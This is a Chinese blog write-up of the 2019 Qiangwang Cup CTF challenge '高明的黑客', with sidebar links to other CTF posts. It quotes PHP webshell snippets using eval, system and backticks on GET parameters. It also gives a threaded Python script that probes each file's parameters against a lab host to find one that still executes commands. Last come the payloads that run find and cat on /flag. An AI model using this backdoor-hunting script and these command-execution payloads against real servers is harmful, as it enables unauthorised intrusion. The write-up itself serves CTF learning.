NO.2-4 [强网杯 2019]高明的黑客

最新推荐文章于 2022-06-24 18:05:59 发布
最新推荐文章于 2022-06-24 18:05:59 发布
阅读量109 收藏
点赞数
分类专栏: BUUCTF python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/119091306
版权

[强网杯 2019]高明的黑客

访问压缩包内php文件,传入参数未报错且具有返回值

存在形如

$_GET['ganVMUq3d'] = ' ';
eval($_GET['ganVMUq3d'] ?? ' ');

$_GET['jVMcNhK_F'] = ' ';
system($_GET['jVMcNhK_F'] ?? ' ');

$_GET['cXjHClMPs'] = ' ';
echo `{$_GET['cXjHClMPs']}`;

思路:遍历文件查找未被置空入口

exp

import os
import threading
import requests
import re
import time

filePath = r"C:\exp\src"
os.chdir(filePath)
files = os.listdir(filePath)

thread_ = threading.Semaphore(100)
requests.adapters.DEFAULT_RETRIES = 5
session = requests.Session()
session.keep_alive = False

max_try = 20

def getContent(file):
    print(file + " is testing")
    thread_.acquire()
    with open(file, encoding='utf-8') as f:
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    params = {}
    data = {}
    for g in gets:
        params[g] = "echo 'ppp_qqq';"
    for p in posts:
        data[p] = "echo 'ppp_qqq';"

    url = 'http://192.168.160.128/src/' + file
    req = session.post(url, data=data, params=params)
    req.encoding = 'utf-8'
    content = req.text
    req.close()

    if 'ppp_qqq' in content:
        flag = ''
        for g in gets:
            req = session.get(url + "?%s=echo 'ppp_qqq';" % g)
            content = req.text
            req.close()
            if 'ppp_qqq' in content:
                flag = g
                break

        if len(flag) == 0:
            for p in posts:
                req = session.post(url, data={p: "echo 'ppp_qqq';"})
                content = req.text
                req.close()
                if 'ppp_qqq' in content:
                    flag = p
                    break

        print('找到了利用文件:' + file + '  利用参数:' + flag)
    thread_.release()



if __name__ == '__main__':
    print("start")
    for file in files:
        time.sleep(0.02)  #加个延时
        t = threading.Thread(target=getContent, args=(file,))
        t.start()

参数测试
/xk0SzyKwfzw.php?Efa5BVG=find / -name *flag* -maxdepth 1

payload
/xk0SzyKwfzw.php?Efa5BVG=cat /flag

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[2023 强网杯qwb]ThinkShopping_强网杯thinkshop,2024年最新2024年网络安全常见面试题目
2301_78416543的博客
04-19 467
/ 查询结果将存储在 $adminData 变量中,可以根据需要进行后续处理和使用。// 查询结果将存储在 $adminData 变量中,可以根据需要进行后续处理和使用。// 这段代码从 ‘admin’ 表中检索数据,并使用缓存来提高性能。// 这段代码从 ‘admin’ 表中检索数据,并使用缓存来提高性能。// 检查 fetch_sql 是否为空且 cache 选项是否存在。
draw.io-22.0.2-windows-installer.exe
01-29
draw.io-22.0.2-windows-installer.exe
[强网杯 2019]高明黑客
夜幕下的灯火阑珊的博客
02-04 24
提示有源码泄露 下载下来后,发现有3000多个文件,做了大量的混淆 推测其中有能执行的php文件 嫖一个一叶飘零大佬的脚本 大致思想是找出$_GET[]里边的参数,然后去执行,类似于$_GET['a'] = echo "sky cool",如果回显中存在sky cool,则该shell能执行 15个进程,花了一个钟头跑出结果 import requests from multiprocessi...
2015广东省强网杯CTF初赛题之大黑阔writeup
1fragment
03-04 8379
2015广东省强网杯CTF初赛题之大黑阔writeup前几天的防火墙与入侵检测课上,老师把广东省强网杯CTF其中的一道初赛题当做实践课的任务,解题时学会了不少东西,觉得挺有趣的,所以记下来,以下writeup仅仅是个人见解,请多多指教^-^-【大黑阔的数据包】是一个.pcap文件 详细步骤如下:用Wireshark打开.pcap文件。 1、协议统计:在菜单中选择Statistics,然后选择Pr
BUUCTF 个人做题记录【6-24】
qq_61620566的博客
06-24 689
学习笔记,大佬勿喷
draw.io-21.6.8-windows-no-installer.rar
09-06
drawio-desktop is a diagramming and whiteboarding desktop app based on Electron that wraps the core draw.io editor.
UN Regulation No.156 - Software update and software update manag
07-08
【标题】:“UN Regulation No.156 - 软件更新和软件更新管理系统” 【描述】:“软件更新管理:UNECE R156 SUMS(Software Update Management System)” 【标签】:“R156 SUMS 软件更新” 【正文】: 联合国...
openwrt-23.05.2-x86-64-generic-ext4-combined-efi.img.gz
最新发布
04-24
openwrt软路由
draw.io-14.5.1-windows-no-installer.exe
04-13
draw.io 是一款免费的在线图表编辑工具, 可以用来编辑工作流, BPM, org charts, UML, ER图, 网络拓朴图等. 这是一个免安装版本。双击就可以使用
[CISCN2019 总决赛 Day1 Web4]Laravel1
nigo134的博客
06-17 897
反序列化漏洞laravel pop链的挖掘显而易见的考察反序列化漏洞,并且告诉了备份source.tar.gz,直接下载下来开始找pop链。反序列化的触发点一般为__wakeup()或者__destruct(),更多的是destruct,先找destruct。使用phpstrom,Ctrl+Shift+R查找function __destruct:通过逐个分析找到一个可以文件包含的链, TagAwareAdapter类: 调用过程:__destruct() -> commit() -> invalidat
[安洵杯 2019]iamthinking
nigo134的博客
06-17 706
thinkphp6.0反序列化漏洞一进来就发现forbiden,直接目录扫描一波~发现www.zip,下载下来开始代码审计:挺简单的就一个index.php控制器,代码大概意思将GET传入的payload参数进行发序列化,但是payload不能以O开头,妥妥的考反序列化漏洞,O是php对象序列化后的第一个字符,既然不能以O开头,那么就把对象放进一个数组里就行了,这样就是以a开头了从而绕过。接下来就是找pop链了,先看看thinkphp6.0有没有已知反序列化漏洞。 发现6.0刚好存在反序列化漏洞,网上随便搜
[羊城杯2020]easyphp
nigo134的博客
06-15 551
1. .htaccess的利用.htaccess利用方式 .htaccess相关问题2.php://filter的利用关于php://filter在file_put_contents中的利用_bfengj的博客-CSDN博客 核心代码: filename只能由点和字母组成,content不能有flag和file。乍一看挺简单的filename传a.php,content传再用蚁剑访问就行了。但事实是想多了,确实能够将木马写入a.php,也可以访问a.php,但......
NO.2-6 [GWCTF 2019]我有一个数据库
nigo134的博客
07-26 168
该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞 使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入 查看相关版本信息 百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) &&amp..
NO.2-5 [GXYCTF2019]禁止套娃(无参rce)
nigo134的博客
07-26 160
知识点: localeconv() 函数返回一包含本地数字及货币格式信息的数组。 scandir() 列出 images 目录中的文件和目录。 readfile() 输出一个文件。 current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 next() 函数将内部指针指向数组中的下一个元素,并输出。 array_reverse()以相反的元素顺序返回数组。 highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 1
NO.2-7 [BJDCTF2020]The mystery of ip
nigo134的博客
07-26 133
SSTI模板注入: 之前也写过:https://www.cnblogs.com/wangtanzhi/p/12238779.html SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTM
NO.5 [ACTF2020 新生赛]Include
nigo134的博客
07-19 124
知识点 ?file=flag.php 猜测文件包含漏洞 php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 php://input 伪协议 + POST发送PHP代码 (不行) ...
NO.2-8 [BJDCTF2020]ZJCTF,不过如此
nigo134的博客
07-26 102
知识点 php://input filter伪协议 preg_replace() /e模式命令执行 题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&gt...
NO.1 [HCTF 2018]WarmUp
nigo134的博客
07-19 96
mb_substr() 函数返回字符串的一部分,之前我们学过 substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用 mb_substr()。 注释:如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 payload: ?file=hint.php%253F../../../../../ffffllllaaaagggg 挺简单的,用多个../把hint.php%3f当成目录跳过,直接读取根目录下的ffffllllaaaagggg 代码
取出css路径为:html body.no-electron.desktop.no-mobile.vsc-initialized div#__nuxt div#__layout div div.pc-layout section.el-container.is-vertical main.el-main div.id-photo div.ICbox4 div.bottom div.fileList div.imgBox div.resImg div.i-image-koutu div.crop-box img图片的链接
07-22
var cssPath = 'html body.no-electron.desktop.no-mobile.vsc-initialized div#__nuxt div#__layout div div.pc-layout section.el-container.is-vertical main.el-main div.id-photo div.ICbox4 div.bottom div....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值